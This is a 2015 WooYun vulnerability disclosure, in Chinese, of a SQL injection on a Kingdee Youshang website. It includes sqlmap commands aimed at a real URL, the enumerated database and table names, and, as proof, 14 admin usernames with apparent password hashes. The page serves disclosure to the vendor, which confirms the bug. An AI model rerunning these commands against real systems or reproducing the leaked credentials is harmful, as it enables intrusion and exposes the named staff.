当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118077

漏洞标题:金蝶友商某站SQL注入漏洞可拖库获取大量敏感信息

相关厂商:金蝶

漏洞作者: blackchef

提交时间:2015-06-04 10:00

修复时间:2015-07-19 14:18

公开时间:2015-07-19 14:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-04: 细节已通知厂商并且等待厂商处理中
2015-06-04: 厂商已经确认,细节仅向厂商公开
2015-06-14: 细节向核心白帽子及相关领域专家公开
2015-06-24: 细节向普通白帽子公开
2015-07-04: 细节向实习白帽子公开
2015-07-19: 细节向公众公开

简要描述:

金蝶

详细说明:

python sqlmap.py -u "http://jinan.youshang.com/help/kiszyb/search.php?q=123" --dbs


available databases [5]:
[*] activity
[*] information_schema
[*] test
[*] youshangportal
[*] ysproject


python sqlmap.py -u "http://jinan.youshang.com/help/kiszyb/search.php?q=123" -D youshangportal --tables


Database: youshangportal
[359 tables]
+--------------------------------+
| EE_AWARD_LOG |
| EE_DIGG_LOG |
| EE_MESSAGE |
| EM_USER |
| agiletour_bingo |
| answer |
| auction_log |
| auction_orderlist |
| auction_product |
| cards |
| ee_news_detail |
| ee_order_list |
| ee_product |
| ee_product_comment |
| em_class_info |
| em_product_class |
| em_special |
| fouryear_kill |
| fouryear_product |
| fouryear_user |
| grab_bid |
| grab_child |
| grab_parent |
| grab_user |
| grab_user_point |
| kdcms_admin |
| kdcms_admin_panel |
| kdcms_admin_role |
| kdcms_admin_role_priv |
| kdcms_announce |
| kdcms_application |
| kdcms_application_data |
| kdcms_attachment |
| kdcms_attachment_index |
| kdcms_badword |
| kdcms_block |
| kdcms_block_history |
| kdcms_block_priv |
| kdcms_cache |
| kdcms_case |
| kdcms_case_data |
| kdcms_category |
| kdcms_category_priv |
| kdcms_collection_content |
| kdcms_collection_history |
| kdcms_collection_node |
| kdcms_collection_program |
| kdcms_comment |
| kdcms_comment_check |
| kdcms_comment_data_1 |
| kdcms_comment_setting |
| kdcms_comment_table |
| kdcms_content_check |
| kdcms_copyfrom |
| kdcms_datacall |
| kdcms_dbsource |
| kdcms_download |
| kdcms_download_data |
| kdcms_downservers |
| kdcms_ebook |
| kdcms_ebook_data |
| kdcms_ep_define |
| kdcms_ep_define_data |
| kdcms_extend_setting |
| kdcms_favorite |
| kdcms_hits |
| kdcms_ipbanned |
| kdcms_keylink |
| kdcms_link |
| kdcms_linkage |
| kdcms_log |
| kdcms_member |
| kdcms_member_detail |
| kdcms_member_group |
| kdcms_member_menu |
| kdcms_member_verify |
| kdcms_member_vip |
| kdcms_menu |
| kdcms_message |
| kdcms_message_data |
| kdcms_message_group |
| kdcms_model |
| kdcms_model_field |
| kdcms_module |
| kdcms_mood |
| kdcms_news |
| kdcms_news_data |
| kdcms_page |
| kdcms_pay_account |
| kdcms_pay_payment |
| kdcms_pay_spend |
| kdcms_picture |
| kdcms_picture_data |
| kdcms_plugin |
| kdcms_plugin_var |
| kdcms_position |
| kdcms_position_data |
| kdcms_poster |
| kdcms_poster_201107 |
| kdcms_poster_201108 |
| kdcms_poster_201109 |
| kdcms_poster_201110 |
| kdcms_poster_201111 |
| kdcms_poster_201112 |
| kdcms_poster_201201 |
| kdcms_poster_201202 |
| kdcms_poster_201203 |
| kdcms_poster_201204 |
| kdcms_poster_201205 |
| kdcms_poster_201206 |
| kdcms_poster_201207 |
| kdcms_poster_201208 |
| kdcms_poster_201210 |
| kdcms_poster_201211 |
| kdcms_poster_201212 |
| kdcms_poster_201301 |
| kdcms_poster_201302 |
| kdcms_poster_201303 |
| kdcms_poster_201304 |
| kdcms_poster_201305 |
| kdcms_poster_201306 |
| kdcms_poster_201307 |
| kdcms_poster_201308 |
| kdcms_poster_201309 |
| kdcms_poster_201310 |
| kdcms_poster_201311 |
| kdcms_poster_201312 |
| kdcms_poster_201401 |
| kdcms_poster_201402 |
| kdcms_poster_space |
| kdcms_queue |
| kdcms_release_point |
| kdcms_search |
| kdcms_search_keyword |
| kdcms_session |
| kdcms_site |
| kdcms_special |
| kdcms_special_c_data |
| kdcms_special_content |
| kdcms_sphinx_counter |
| kdcms_sso_admin |
| kdcms_sso_applications |
| kdcms_sso_members |
| kdcms_sso_messagequeue |
| kdcms_sso_session |
| kdcms_sso_settings |
| kdcms_tag |
| kdcms_template_bak |
| kdcms_times |
| kdcms_type |
| kdcms_urlrule |
| kdcms_videodemo |
| kdcms_videodemo_data |
| kdcms_vote_data |
| kdcms_vote_option |
| kdcms_vote_subject |
| kdcms_wap |
| kdcms_wap_type |
| kdcms_workflow |
| kis_collection |
| lsw_func |
| lsw_user |
| lsw_user_state |
| member |
| moweekly_wp_comments |
| moweekly_wp_links |
| moweekly_wp_options |
| moweekly_wp_postmeta |
| moweekly_wp_posts |
| moweekly_wp_term_relationships |
| moweekly_wp_term_taxonomy |
| moweekly_wp_terms |
| moweekly_wp_usermeta |
| moweekly_wp_users |
| ms_info |
| phpcms_admin |
| phpcms_admin_role |
| phpcms_admin_role_priv |
| phpcms_ads |
| phpcms_ads_place |
| phpcms_ads_stat |
| phpcms_announce |
| phpcms_app_category |
| phpcms_app_industry |
| phpcms_app_share |
| phpcms_app_suggest |
| phpcms_area |
| phpcms_ask |
| phpcms_ask_actor |
| phpcms_ask_credit |
| phpcms_ask_posts

漏洞证明:

Database: youshangportal
Table: kdcms_admin
[14 entries]
+-----------------+----------------------------------+
| username | password |
+-----------------+----------------------------------+
| guanghong_zhong | 0cfa77a94d6b84903e9e166aafad5ec2 |
| zhuweiwu | 13130b9b53ea5b2ff04b185df43d0ca4 |
| xiaoli_sun | 26ab9e2d5e7aaa64ca9456fa57066460 |
| tiangui_chen | 4ab23c58bec89eced5b8bc502501bb44 |
| liangzi | 675394aa5d40f45c339a55d5a3805d15 |
| qlboob | 757b91e3b3badf72d15dd885c5ff011b |
| fengchunlei | 9f71d34324ae6d438513cb845c3cab91 |
| jingjing_lan | a16bb69d9b83549d87e260b7fdd08a79 |
| jinbao_yang | b999740e47fe84331335aa47df611286 |
| weicheng_lai | c0c3ad8e0fa008a935aeb82f857c3782 |
| liaowei | cf12f62edf9498b9244b44708a22f81f |
| lijuan_lu1 | d5b4878dc4de66830021646af33f24f6 |
| daiyu_wu | f02dc5704927fc650e73d4e9f9a969b2 |
| hongda_yi | fadb8bac81e90fa0c7643721154e06cd |
+-----------------+----------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 blackchef@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-04 14:16

厂商回复:

谢谢对金蝶的关注,深入研究金蝶系统发现安全漏洞。我们已通知相关部门修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-04 14:34 | blackchef ( 普通白帽子 | Rank:191 漏洞数:25 | 爱技术,炸得一手好花生,:-))

    20啊,金蝶够意思